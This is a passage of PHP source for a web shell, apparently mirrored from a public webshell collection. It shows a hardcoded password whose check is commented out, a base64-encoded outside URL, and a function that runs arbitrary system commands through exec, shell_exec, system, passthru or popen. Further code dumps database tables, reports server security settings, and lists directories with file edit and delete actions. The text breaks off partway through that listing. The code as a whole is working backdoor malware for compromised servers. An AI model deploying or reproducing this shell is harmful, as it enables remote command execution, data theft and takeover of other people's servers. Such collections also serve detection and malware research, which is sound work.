mirror of
https://github.com/tennc/webshell
synced 2024-11-22 19:23:05 +00:00
1223 lines
No EOL
55 KiB
PHP
1223 lines
No EOL
55 KiB
PHP
<?
|
|
ini_set('memory_limit', '1000M');
|
|
$_nexpwd = "p4ssw0rdZ";
|
|
//if ($_GET['str'] != $_nexpwd) {die();}
|
|
|
|
|
|
$images = array(
|
|
|
|
|
|
|
|
"change"=>
|
|
"iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABGdBTUEAAK/INwWK6QAAABl0RVh0U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAANESURBVHjaYjxx5tZzXh4OHgYk8O3nb4YfP/8zfHhwjkH3aTHD97+WP8+sP7Pw7d173UxMDC+Q1QIEEAsfH6eAhoo0B7Lgr9//GH7+Z2L4+KafQcrgMQPTX2keaVa1onU9924wMjLMZmBEqAUIIJb///7/YUADzKxMDP+fvWQQZN/EwPQaKHDxBMOni0xfPrJwX//99y8D43+EWoAAYmHAAkAWML9ZxsDB8JiB4T0DGJ/nMOb+kJHX9vXzu3hGBsb7rGxsDKwsbAwAAYTVgL+fPjMwf1jEwPwbyPnOxPDsKSPDV4swRnYedttH9587cXJxzb1x5hrD7ZuXGQACCKsBDB/3MzD/ucjA8ION4f/LvwwvpK0YZF2CGb7dvs5w6fvnn2/fvGTYs2MNUOEfBoAAYsKm///DyQysvJwMDF84GN5/5GP4ouHHICQjxcDM8JeBhYWV4cqlK0BV/4CYjQEggDBc8PfFCQZmjltAzcCY/cTA8I5HjUHQIZSB8/9PBj4eXoYjBw8x3LtzHqiSlQ0UYQABhOoCYAj/ezaPgYkDKPwTaPMHHob3Mp4MglLSDCzABMDIzMjw5vVLTpBuIBYBYm6AAGKBRelPUNS8uMjAwv6QgfGPIJDDzvDqOzuDaFAsw68vHxh+//rJ8OnjJwYmRiZgmmGEuZwXIIDgXvgH8tLfH0CGNAMDBy/Dl+dPGd4IWzNw/GNm+Pn6DVAjI8M/oAtBQQQLKlAoAgQQE3Lc//nNCExELgx//7gyXLwmyPBb1YHhDzCd/f33n4GFlQWohhGkC6wRiD8A8VuAAIK7gJWZgeHhy28Ml/YdYZDm5GZgtM1i4FbSZPjz4xvYMmYWJgYubm4GJiamr0Bn/oZgJgaAAGJCdtOP738Ynt96zsBq7M8grGsODOMfDGzAaBMU5GMQExMHuoKZwcbe8begkCwDIyM4EhgAAoiFCQjBSReINY3NGVQMTBmYBYSANv9m+C3Ay8DKzgb0+38GNjZmBmZmFgYuLk6m8KhYhlu3bjLcv3OdASCAWO7eefhh1Yo1PCAnMjIDYwcUWH9+AZ3FDHTZX4b/IE8Dw4CJiZHhAzAWgGHx68vXLwwKCooMqqrqDAABBgD54A4xrMo1ZAAAAABJRU5ErkJggg==",
|
|
|
|
|
|
"delete" =>
|
|
"R0lGODlhEAAQANUAAMczNfRxdPRzdPNydPNzddgqL+AsNN8sM8cpMOY2PuU2PsUgK+UwOfJVYPRja/NjavNja/Nka8UYJ8YZKMUZJ8YgLPJUYMUTJfE/UvA/UfJIWPFIWNRldN+cqMpdSc5uXspXRspYRslYRtWIfMlQQ9ymoMlHPslHP8hHP8c9OeBhW/WBfcc9OuNST/WAfvSAfuPExP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAADEALAAAAAAQABAAAAZ8wJhwSCwaj0eYZ1QceWBEWKgVYgpHohYIKiyRXCvSp/QhvcIl4ghFEKhMqkHgZCVyWBHIw/FIcZAACg0NFgkASDEIDBsaGgwISBwVGJSUC39FHBOUBRIFGBkUmEIdF6AXHB0cphkXHUMwFwaoQ6sHF1xCsaNCq7mIwMExQQA7",
|
|
|
|
|
|
"folder"=>
|
|
"iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABmJLR0QAAAAAAAD5Q7t/AAAACXBIWXMAAA3XAAAN1wFCKJt4AAAAB3RJTUUH1QsKEjkN+d1wUAAAAX9JREFUOMulkU2IUlEYhp9jKv5AposQWgRBtA6CmSCa5SzjYhG0qYggiP6Y3WxmtrMIol1QM84qRKRlSVC2bBcYRpuIIigFC7F7j0fP/WZx7QriBc2XDw6cw/e8L+9Rly6XtorF4jZTMsYE58Dc2tvdf0KE1J17t+X61RszH7X2eLb3lF6vd6VaqT2PBJSci7Q+taJMeNt4M331qFqpPQCIA6TTGY7k8pEA50IpcFMKpRS1F9X7QAAwxuB5Lq8/9ml2Msylww5nbjpSSOnPYYJmJ8PjjXW0sXMxUslD3H1YPxUH8DwXgJ+/NV/af+cCnDiaBSCmtSadnjP6DMVc1w0T/BfgXwdLARZNYK2PHgZlh7+QiPkIICIopRARRMAXwVphaH3MSBiMLEMr5LLJCcDzXI7nBnT7hh9dD0ThI4wHERAEkTEYGFmZAH512pw+e44PX/+MlwJ3EfARBAUiYaqVkwXqL1+R19/L6vy1nYabOLa2aHnZ4bf378qbqyyrA8KHtMqnsOL4AAAAAElFTkSuQmCC",
|
|
"small_unk"=>
|
|
"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U".
|
|
"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo".
|
|
"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31".
|
|
"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4".
|
|
"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP".
|
|
"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz".
|
|
"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ".
|
|
"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io".
|
|
"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
|
|
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
|
|
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
|
|
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
|
|
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
|
|
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
|
|
"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz".
|
|
"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM".
|
|
"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC".
|
|
"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj".
|
|
"yAsokBkQADs=",
|
|
|
|
"url"=>
|
|
"aHR0cDovL24wdHcuYWx0ZXJ2aXN0YS5vcmcvYy5waHA/dHlwZT1zaGVsbHMmYz0=",
|
|
|
|
"ext_mp3"=>
|
|
"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
|
|
"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
|
|
"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
|
|
"ext_exe"=>
|
|
"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7".
|
|
"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt".
|
|
"xhIAOw==",
|
|
|
|
"ext_html"=>
|
|
"iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABGdBTUEAAK/INwWK6QAAABl0RVh0U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAP3SURBVHjaYtxx5BYDIwMUMDLESIjyTeRiZ2H4//8/WOgvEP/69Zfh5+9/DI8ev3jx9NGDKAYmpovc/MIMc6e0MwAEEAszEyPDP6h+pn9/ORWkBYV4OVlhRjL8Bprz5etfhncfPjP8l5IQ4uVh33Lt2i1foAUXQPIAAcSirC3F8PoXI8N7JmaGrw9f//z67S8DCzMrAwvjPwZWVkYGpv+MDIxAJzIB5VlZGBgsjTRlWFiYN99//BpsCEAAsbCxsTCwMjEx/P3NZPmcSTB2/UNmBsb//xi+fv3DoCH8l8FFlZmBg4WVgZ2dleHHr98Ml27cY/jPwCzDxc23BejLQIAAAEEAvv8CAwH/APT1/l/l7P+/IRwHREEtBQAmJgIA+g4GAKHUBgCGufQA9fb1AAgFAwASEAwA9ff+AOjr8QAFBgob/Pz9YQKI6ePP/7qH7zBP5GJhYtfjZ2KQAnqfCehUoIUMnFzMDBuv8TAsOPSeAWgk0GvMDNxc7AxCvOwM4sI8QJf8/wsQQCzbb/9L/vGLgd9KkoHh03cGhku/GBhefmVg+AjEQHFgxDAzrDr4ncFK/jkDDxcfMDwYGbi4OBhYgF4HBs1/gABiOnf9p/mrT78ZXv9hYHj3m4Hh8hMGhquPGBgevmRgeP+NgeHP5+8Mty98ZLj++D0DK/N/Bm4OdmDA/mDg52QDxztAADG9fPyDb/eRDwzTjvxmAJrBYAx0yV+gzfeBBvz68pfh64PXDOxcrAx//4Jih4mBDRgVPDxAlwDZoNgBCCCmPz//Pn15+iXDiyufGF5+ANnAwMD66yfDzcNPGIS/vWb4+uITAycvE1icmQUYlaysDF8/vwMGKhM4nQAEENOz84t2i4mJMHiYcDNI8DMyCAJdZi4FjB9LVgZ9VW4GEWleBgWJHwxSQEOYgdH5H5jsRETFGf4D0wUorQIEENODQ5MWq2h9uSUty8EgJcDAIMfOwOCpy8FQkibOoKbOy+AaKMbgYfiRQVxEDOhkFgZmYJp58fwJMGj/AkOAkQEggFh+fHj54uLq1PhTurMXPXqkpsr5+QMDDzczA5cML8OzN58YBN+dY7DSEGLgFxJl+AUMh3///jDIysgDww/".
|
|
"kgv8MAAHEDPLH19ePnpzcsmzLzduvFT4zKGucOP+M4ffnZwyKrI8ZbDVEGBSUNYDqgRr+/WdgAtL37txgEAZ6Y9XKlacAAogFlmn+fnt3X+bv6e0L6tr8P757B4yJvwzcvIIMbBycDH+".
|
|
"Bnv0NzI3ADMHw5+8/Bg1dYwYmNmB+YWXlAAggRE4GxsnUeev09+zalvDsySOgwYzgDA2y9T/Df3juBDFBPBYWNsbbN86fBAgwAD3nU17W2F2kAAAAAElFTkSuQmCC",
|
|
|
|
"ext_jpg"=>
|
|
"iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAACjUlEQVQ4jW2STW8jRRCGn+rp+UhGdmKPN5YhwYFIDuxHDrn4Hu6RyE/YC8oPyB+BAzlyzoUjSAgJrbRI5IKEEmmFYKNI3ll2bLPxbpZxnJ5uDjNxshJ96Gqpup56u94W5xwHBwfB/v7+l0op5ZwTgP+JjmoVReH29va+Pj09LTTAysrK4pM/069+fDYA5vcAEEBEQAQl5fnz3ipJknwDlIAoilQYhjSaDQCUSFksglRFSlQZlRAvLrC1taWBKw0QBIFarsVsfBggVVsBBEFEiHwPB7TiiLdXhsai0Ol0NEC5ae2tJ8uEdcXo3ZT82jA1BeIcjcgnDjSeEpYDC7zlzfCCVqt1CwjDUP387Iwf/niJrz18z8PXHrXI53F/lSQYUw8sSoAaXDbvkaV/+3cBnhcv8EGyPB9eLfR41KnRqQc0wgb59B++H/3KLxenrC/cZz1a9eYA3/dVgdBY8HjYjnjQDqjH7xjkf/Fk+Irn+Ut+ev0b6dUIgMfRZwRBcAtQSqn+x00+/WjKi2nG8b9jppezylKfuu7yxb1u5YrwqPaAy1dvbgHOOWnVm7Ro8olz3Pkzt/+hKpbK4qfqqZoDynyZMMaQZRmTyYSiKOh2u2RZhjGGOI5ZW1vDOZkXqAqgbujX19cMBgPOzs4wxnBycsJ4PKbdbmOMwSEU1mKtZQ7wPE8rpd6TubS0xPb2Nv1+nzzPybKM8/NzCmNxtmA2m8ndIXo3T0jTlF6vR7PZpHKInZ0drIWNjR5QoLXH8fHx5e7ubqlAa61vOm9ubpIkyXtqnCtnA5YoihgOh78fHh6+nivI8/wiTdNvnXMWsM45KyLWOWedwxbWFcbMbBSGs8lkkh0dHX03Go2mAP8BZNgCDYdm9o4AAAAASUVORK5CYII=",
|
|
"ext_php"=>
|
|
"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg".
|
|
"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==",
|
|
"ext_pl"=>
|
|
"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo".
|
|
"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7",
|
|
"ext_swf"=>
|
|
"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".
|
|
"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
|
|
"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".
|
|
"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".
|
|
"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",
|
|
"ext_tar"=>
|
|
"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC".
|
|
"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF".
|
|
"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD".
|
|
"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p".
|
|
"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
|
|
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
|
|
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
|
|
"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg".
|
|
"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd".
|
|
"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB".
|
|
"u4tLAgEAOw==",
|
|
|
|
"ext_txt"=>
|
|
"iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAACXBIWXMAAAsTAAALEwEAmpwYAAAABGdBTUEAALGOfPtRkwAAACBjSFJNAAB6JQAAgIMAAPn/AACA6QAAdTAAAOpgAAA6mAAAF2+SX8VGAAACm0lEQVR42mLs7+//z0ABAAhAcRzbAAjDABD8gpXYy6O4ZxKWQCxATUuB4+A4glD8ST/9iAjr3vDobIdzeaNEjn8pCVYcqzHq2JPcNTmXGVXlE0AsMJPMVZkZ/jMwM9hosDD8A7rpHyMTw5/P7xi+Pn/CwCwizcDExcPw99dvhr9AyT9//8JdABBAcAMEuJmgLCgNNOTP60kMDDycDJ8fyjCwKZkxcEqrMPz9/ZPh/3+4NgaAAGLB5i9QoPx+d4mB8VcvA+sHBgbmB44MP6WNGZj+/Gf4B8L//jGwcUDUAgQQE1YD/gGJL/MYWBm/Mfy7y8Lwm1uPgUNei+H/n19A2/8z/EXyAkAAsWCz/e/HWwxMv3cyMHxWYPjySZSByTyCgZHhH9hmkGaQITAAEECYBgAN//9hMQMrMxvDv7dCDD9l/Ri45XUZ/v36BgzAfwyMjIwMzMzMcPUAAQT3AshUkMv/frnDwMx6AxgIqgzfviowsOr6g0QhipmYgC74h2IhQADBXfD9+w+g6awMTJ/2MLCyCDD8+8jI8J1bg4FbQpnhHzDkfwLTAUjNjx+/GTg4WBn4+PjA+gACCOEFYLz/+/aMgeXnKwYGdiWGr58/MfxXcmP48vU7w/cvnxn+/PnD8AuYDkDh8Pv3L7g2gACCG8AE9Bcojv8ymTL8//ST4c3fT0CDRBj+ffgI9vefP38ZLl06C9cIYwMEEMIAoP++//rHcPvQJQZhRT0GBkVHBiZgfLKwMAOdzA5UwQ5WFx4eDqZBybiwsFAYIIAQBjAyMLBx8jIIKhsy8GmZA6MNmLCBgpyc7AysrKxA/3+D2w7VzAUKOoAAghvAwszEwCIqxaAKxNgAFxc3smYWWNQABBALTJBYgKwZBAACDAAKWftvHUTAkgAAAABJRU5ErkJggg==",
|
|
|
|
);
|
|
|
|
if ($_GET[act] == "img") {
|
|
|
|
header("Content-type: image/gif");
|
|
header("Cache-control: public");
|
|
header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
|
|
header("Cache-control: max-age=".(60*60*24*7));
|
|
header("Last-Modified: ".date("r",filemtime(__FILE__)));
|
|
|
|
$image = $images[$_GET['img']];
|
|
echo base64_decode($image);
|
|
die();
|
|
}
|
|
// Function for table dump
|
|
function getperms ($perms) { // <--- thx to php.net
|
|
|
|
|
|
if (($perms & 0xC000) == 0xC000) {
|
|
// Socket
|
|
$info = 's';
|
|
} elseif (($perms & 0xA000) == 0xA000) {
|
|
// Symbolic Link
|
|
$info = 'l';
|
|
} elseif (($perms & 0x8000) == 0x8000) {
|
|
// Regular
|
|
$info = '-';
|
|
} elseif (($perms & 0x6000) == 0x6000) {
|
|
// Block special
|
|
$info = 'b';
|
|
} elseif (($perms & 0x4000) == 0x4000) {
|
|
// Directory
|
|
$info = 'd';
|
|
} elseif (($perms & 0x2000) == 0x2000) {
|
|
// Character special
|
|
$info = 'c';
|
|
} elseif (($perms & 0x1000) == 0x1000) {
|
|
// FIFO pipe
|
|
$info = 'p';
|
|
} else {
|
|
// Unknown
|
|
$info = 'u';
|
|
}
|
|
|
|
// Owner
|
|
$info .= (($perms & 0x0100) ? 'r' : '-');
|
|
$info .= (($perms & 0x0080) ? 'w' : '-');
|
|
$info .= (($perms & 0x0040) ?
|
|
(($perms & 0x0800) ? 's' : 'x' ) :
|
|
(($perms & 0x0800) ? 'S' : '-'));
|
|
|
|
// Group
|
|
$info .= (($perms & 0x0020) ? 'r' : '-');
|
|
$info .= (($perms & 0x0010) ? 'w' : '-');
|
|
$info .= (($perms & 0x0008) ?
|
|
(($perms & 0x0400) ? 's' : 'x' ) :
|
|
(($perms & 0x0400) ? 'S' : '-'));
|
|
|
|
// World
|
|
$info .= (($perms & 0x0004) ? 'r' : '-');
|
|
$info .= (($perms & 0x0002) ? 'w' : '-');
|
|
$info .= (($perms & 0x0001) ?
|
|
(($perms & 0x0200) ? 't' : 'x' ) :
|
|
(($perms & 0x0200) ? 'T' : '-'));
|
|
|
|
return $info;
|
|
}
|
|
|
|
|
|
function datadump ($table) { // <--- thx to mrwebmaster for function
|
|
|
|
# Creo la variabile $result
|
|
$result .= "# Dump of $table \n";
|
|
$result .= "# Dump DATE : " . date("d-M-Y") ."\n\n";
|
|
|
|
# Conto i campi presenti nella tabella
|
|
$query = mysql_query("select * from $table");
|
|
$num_fields = @mysql_num_fields($query);
|
|
|
|
# Conto il numero di righe presenti nella tabella
|
|
$numrow = mysql_num_rows($query);
|
|
|
|
# Passo con un ciclo for tutte le righe della tabella
|
|
for ($i =0; $i<$numrow; $i++)
|
|
{
|
|
$row = mysql_fetch_row($query);
|
|
|
|
# Ricreo la tipica sintassi di un comune Dump
|
|
$result .= "INSERT INTO ".$table." VALUES(";
|
|
|
|
# Con un secondo ciclo for stampo i valori di tutti i campi
|
|
# trovati in ogni riga
|
|
for($j=0; $j<$num_fields; $j++) {
|
|
$row[$j] = addslashes($row[$j]);
|
|
$row[$j] = ereg_replace("\n","\\n",$row[$j]);
|
|
if (isset($row[$j])) $result .= "\"$row[$j]\"" ; else $result .= "\"\"";
|
|
if ($j<($num_fields-1)) $result .= ",";
|
|
}
|
|
|
|
# Chiudo l'istruzione INSERT
|
|
$result .= ");\n";
|
|
}
|
|
|
|
return $result . "\n\n\n";
|
|
}
|
|
|
|
// using which THX TO R57
|
|
function whicha($pr)
|
|
{
|
|
$path = exa("which $pr");
|
|
if(!empty($path)) { return $path; } else { return $pr; }
|
|
}
|
|
// executing command THX TO R57
|
|
function exa($cfe)
|
|
{
|
|
$res = '';
|
|
if (!empty($cfe))
|
|
{
|
|
if(function_exists('exec'))
|
|
{
|
|
@exec($cfe,$res);
|
|
$res = join("\n",$res);
|
|
}
|
|
elseif(function_exists('shell_exec'))
|
|
{
|
|
$res = @shell_exec($cfe);
|
|
}
|
|
elseif(function_exists('system'))
|
|
{
|
|
@ob_start();
|
|
@system($cfe);
|
|
$res = @ob_get_contents();
|
|
@ob_end_clean();
|
|
}
|
|
elseif(function_exists('passthru'))
|
|
{
|
|
@ob_start();
|
|
@passthru($cfe);
|
|
$res = @ob_get_contents();
|
|
@ob_end_clean();
|
|
}
|
|
elseif(@is_resource($f = @popen($cfe,"r")))
|
|
{
|
|
$res = "";
|
|
while(!@feof($f)) { $res .= @fread($f,1024); }
|
|
@pclose($f);
|
|
}
|
|
}
|
|
return $res;
|
|
}
|
|
// function pari
|
|
function pari($num) {
|
|
return ($num%2 == 0) ? TRUE : FALSE;
|
|
}
|
|
|
|
|
|
// Getting Directory..
|
|
if ($_POST['dir'] == "") {
|
|
if ($_COOKIE['dir'] == "") {
|
|
$dir=realpath(".");
|
|
}
|
|
else
|
|
{
|
|
$d = str_replace("\\",DIRECTORY_SEPARATOR, $_COOKIE['dir']);
|
|
$d = str_replace("\\\\","\\", $_COOKIE['dir']);
|
|
$dir = $d;
|
|
}
|
|
}
|
|
else
|
|
{
|
|
$dir = str_replace("\\",DIRECTORY_SEPARATOR,$_POST['dir']);
|
|
$d = str_replace("\\\\","\\", $_POST['dir']);
|
|
setcookie("dir",$dir);
|
|
}
|
|
|
|
if (substr($dir,-1) != DIRECTORY_SEPARATOR) {$dir .= DIRECTORY_SEPARATOR;}
|
|
// Getting something...
|
|
$safemode_off_msg = "<font color=green>Safe Mode: OFF</font><br />";
|
|
$safemode_on_msg = "<font color=red>Safe Mode: ON</font><br />";
|
|
$gpc_off_msg = "<font color=green>Magic Quotes: OFF</font><br />";
|
|
$gpc_on_msg = "<font color=red>Magic Quotes: ON</font><br />";
|
|
$auf_on_msg = "<font color=green>Allow URL Fopen: ON</font><br />";
|
|
$auf_off_msg = "<font color=red>Allow URL Fopen: OFF</font><br />";
|
|
$reglobals_on_msg = "<font color=green>Register Globals: ON</font><br />";
|
|
$reglobals_off_msg = stripslashes("<font color=red>Register Globals: OFF</font><br />");
|
|
$uname = php_uname();
|
|
(ini_get("safe_mode") == 0) ? $safemode = $safemode_off_msg : $safemode = $safemode_on_msg;
|
|
(ini_get("magic_quotes_gpc") == 0) ? $gpc = $gpc_off_msg : $gpc = $gpc_on_msg;
|
|
(ini_get("allow_url_fopen") == 1) ? $auf = $auf_on_msg : $auf = $auf_off_msg;
|
|
(ini_get("register_globals") == 1) ? $reglobals = $reglobals_on_msg : $reglobals = $reglobals_off_msg;
|
|
|
|
$freespace = disk_free_space($dir);
|
|
$totalspace = disk_total_space($dir);
|
|
$percentfree = round(($freespace*100)/$totalspace);
|
|
$percentbusy = 100-$percentfree;
|
|
$freespace = intval((($freespace/1024)/1024)/1024);
|
|
$totalspace = intval((($totalspace/1024)/1024)/1024);
|
|
$freespace .= " GB";
|
|
$totalspace .= " GB";
|
|
$current_user = "Who are you? ".get_current_user()."<br />";
|
|
$uid = "Uid: ".getmyuid()." Gid: ".getmygid()."<br />";
|
|
|
|
|
|
if ($_POST['mode'] == "") $_POST['mode'] = "ls";
|
|
if ($_POST['mode'] == "ls") {
|
|
//Directory listing
|
|
$output .= "<br /><br />Directory listing [ {$dir} ]<br /><div align=left>";
|
|
$output .= '<table width="100%" border="0" cellspacing="0" cellpadding="0">
|
|
<tr>
|
|
|
|
<td style="border-bottom:#FFFFFF 1px solid;" width="10%">perms</td>
|
|
<td style="border-bottom:#FFFFFF 1px solid;" width="5%"> </td>
|
|
<td style="border-bottom:#FFFFFF 1px solid;" width="50%">name</td>
|
|
<td style="border-bottom:#FFFFFF 1px solid;" width="20%">owner/group</td>
|
|
<td style="border-bottom:#FFFFFF 1px solid;" width="15%">actions</td>
|
|
</tr>';
|
|
$opendir = opendir($dir)or print("<font color=red>Can't open directory</font>");
|
|
$i = 1;
|
|
while ($file=readdir($opendir)){
|
|
$color = "#333333";
|
|
|
|
$icons = array(
|
|
"txt" => "ext_txt",
|
|
"ini" => "ext_txt",
|
|
"sql" => "ext_txt",
|
|
"php" => "ext_php",
|
|
"pl" => "ext_pl",
|
|
"html" => "ext_html", "htm" => "ext_html",
|
|
"mp3" => "ext_mp3",
|
|
"swf" => "ext_swf",
|
|
"rar" => "ext_tar",
|
|
"zip" => "ext_tar",
|
|
"tar" => "ext_tar",
|
|
"gz" => "ext_tar",
|
|
"bz" => "ext_tar",
|
|
"exe" => "ext_exe",
|
|
"jpg" => "ext_jpg", "png" => "ext_jpg", "gif" => "ext_jpg");
|
|
|
|
if ($dir == realpath(".")) {
|
|
if (is_file($file)){
|
|
|
|
$ext = array_pop(explode(".",$file));
|
|
if (array_key_exists($ext, $icons)) $icon = $icons[$ext];
|
|
else $icon = "small_unk";
|
|
|
|
if (function_exists("posix_getpwuid")) {
|
|
$uid = posix_getpwuid(fileowner($file));
|
|
$gr00p = posix_getgrgid(filegroup($file));
|
|
$owner = $uid[name]."/".$gr00p[name]; }
|
|
else
|
|
{
|
|
$owner = fileowner($file)."/".filegroup($file);
|
|
}
|
|
$perms = fileperms($file);
|
|
$info = getperms($perms);
|
|
if (!is_readable($file)) $info = "<font color=red>{$info}</font>";
|
|
elseif (!is_writable($file)) $info = "<font color=white>{$info}</font>";
|
|
else $info = "<font color=green>{$info}</font>";
|
|
$output.= ' <tr style="background-color:'.$color.';">
|
|
<td style="border-bottom:#FFFFFF 1px solid;">'.$info.'</td>
|
|
<td style="border-bottom:#FFFFFF 1px solid;" align="right"><img src="http://'.getenv("HTTP_HOST").$_SERVER['PHP_SELF'].'?act=img&img='.$icon.'" /></td>
|
|
<td style="border-bottom:#FFFFFF 1px solid;">'.$file.'</td>
|
|
<td style="border-bottom:#FFFFFF 1px solid;">'.$owner.'</td>
|
|
<td style="border-bottom:#FFFFFF 1px solid;"><a class="link" href="javascript:document.fedit.modfile.value=\''.$file.'\';document.fedit.submit();"><img src="'.$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'].'&act=img&img=change" border=0 /></a> - <a class="link" href="javascript:document.delfile.delfile.value=\''.$file.'\';document.delfile.submit();"><img src="'.$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'].'&act=img&img=delete" border=0 /></a></td>
|
|
</tr>';
|
|
|
|
}
|
|
else
|
|
{
|
|
|
|
if (function_exists("posix_getpwuid")) {
|
|
$uid = posix_getpwuid(fileowner($file));
|
|
$gr00p = posix_getgrgid(filegroup($file));
|
|
$owner = $uid[name]."/".$gr00p[name]; }
|
|
else
|
|
{
|
|
$owner = fileowner($file)."/".filegroup($file);
|
|
}
|
|
$perms = fileperms($file);
|
|
$info = getperms($perms);
|
|
if (!is_readable($file)) $info = "<font color=red>{$info}</font>";
|
|
elseif (!is_writable($file)) $info = "<font color=white>{$info}</font>";
|
|
else $info = "<font color=green>{$info}</font>";
|
|
|
|
$output.= ' <tr style="background-color:'.$color.';">
|
|
<td style="border-bottom:#FFFFFF 1px solid;">'.$info.'</td>
|
|
